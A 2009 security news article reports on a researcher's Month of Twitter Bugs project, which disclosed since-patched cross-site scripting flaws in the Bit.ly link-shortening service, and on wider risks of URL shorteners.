Month of Twitter Bugs focuses on Bit.ly flaws

Month of Twitter Bugs focuses on Bit.ly flaws

Tags:   Bit.ly  Twitter  Web Application and Web 2.0 Threats

By Robert Westervelt | Jul 2, 2009

Thumbnail: 

A security researcher highlighting vulnerabilities in third-party Twitter applications this month focused on several serious cross-site scripting (XSS) flaws in the popular Bit.ly link-shortening service.

Aviv Raff launched the Month of Twitter Bugs today, showcasing the Bit.ly errors. Raff gave notice to Bit.ly programmers and in less than three hours the final flaw was patched.

Bit.ly is one of the more popular URL-shortening services. Users who set up an account with the service can track their shortened links. The service is integrated with Firefox as well as several third-party Twitter organizer applications. In addition to Bit.ly, nearly a dozen other link-shortening services are available.

Raff highlighted XSS errors in the URL and keywords parameter and similar vulnerabilities in the username field of the Bit.ly login page and the content-type field of the URL info page. The flaws were discovered by security researchers Mike Bailey and Mario Heiderich. It took Bit.ly developers about a month to correct the errors, with the latest one patched today.

"With such a poor response rate to security vulnerabilities and with such a poorly coded website, in terms of security, we can only hope for the best," Raff wrote in his blog. "Please be careful clicking those shortened URLs." XSS errors enable an attacker to insert malicious coding into a link that appears to be from a trustworthy source. When someone clicks on the link, the embedded programming is submitted as part of the client's Web request and can execute on the user's computer, typically allowing the attacker to steal information. When Web forms contain XSS errors, attackers alter the HTML that controls the behavior of the form.

Link shortening services have come under increased scrutiny in recent months. A security breach in URL shortener Cligs (Cli.gs) last month redirected 2.2 million URLs to a single Web page. The Web page was not malicious, but it highlighted the threat posed by flaws in the link shortening services.

Raff announced in June that he planned to document Twitter related flaws. The security researcher documented browser flaws in a similar format in 2006. The latest project is being showcased on Raff's Twitpwn website.

The bug tracking project is getting a lot of attention from security professionals who are dealing with an increased use of Twitter, Facebook and other Web-based social networking services.

Raff has been critical of Twitter and third-party services that rely on Twitter's API to connect to the Twitter platform. He said in a recent blog post that the API could be used as a springboard by attackers to create Twitter worms and spread malware to steal sensitive data from users.

The Month of Twitter Bugs is accepting submissions of vulnerabilities discovered by third-party Twitter services.

Similar

Related Articles

Add comment

Post a Comment

The content of this field is kept private and will not be shown publicly.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <a> <p> <span> <div> <h1> <h2> <h3> <h4> <h5> <h6> <img> <img /> <map> <area> <hr> <br> <br /> <ul> <ol> <li> <dl> <dt> <dd> <table> <tr> <td> <em> <b> <u> <i> <strong> <font> <del> <ins> <sub> <sup> <quote> <blockquote> <pre> <address> <code> <cite> <embed> <object> <strike> <caption>
  • Lines and paragraphs break automatically.
  • Use <!--pagebreak--> to create page breaks.

More information about formatting options

 

Similar

Related Articles

knowledge_central_tab

 
 
Knowledge Central
Staying a step ahead of hackers new
Organizations are relying more and more on Web applications as a primary means of doing business. As the number and complexity of Web applications grow, so does the number of vulnerabilities introduced into your Web environment. Unfortunately, this makes you very attractive to hackers.
Outlook: Emerging security technology trends
As part of an ongoing discussion from IBM, this white paper helps us to gain a perspective on the security challenges organizations will face in the next few years. What fundamental technology trends are expected to impact organizations this and the following years? And how can organizations position themselves to profit from the myriad opportunities while managing the risk that inevitably accompanies them?
 
 
 
Hong Leong Financial opts for Juniper Networks at new Malaysia head office, data center
Hong Leong Financial Group Berhad builds complete and seamless data center and office network infrastructure with Juniper switches, security devices and Junos software.
Budget-conscious NGO cuts costs and improves IT productivity with Symantec
St James' Settlement reduces staff time spent on data protection administration by 80% and on software inventories by almost 100%.
 
 
 

Recent popular content

Most Read
Internet Explorer vulnerabities cause data leakage
Tripwire steps into SIEM territory
Microsoft expands SDL program
What to do with Microsoft SMB2 vulnerability
Following up with networking penetration tests

Site map
Search Security Asia
About Us
Print/Digital Subscription
Sales
Feedback
Security Tips
Expert Opinions
Research
White Papers
Case Studies

Blogs
Topics
Application security
Disaster recovery and business continuity
Identity management and access control
Information security careers, training and certifications
Topics
Network and Internet Security
Security best practices
Security threats
Surveillance and facilities management
Media
Videos
Podcasts
Webcasts
News
RSS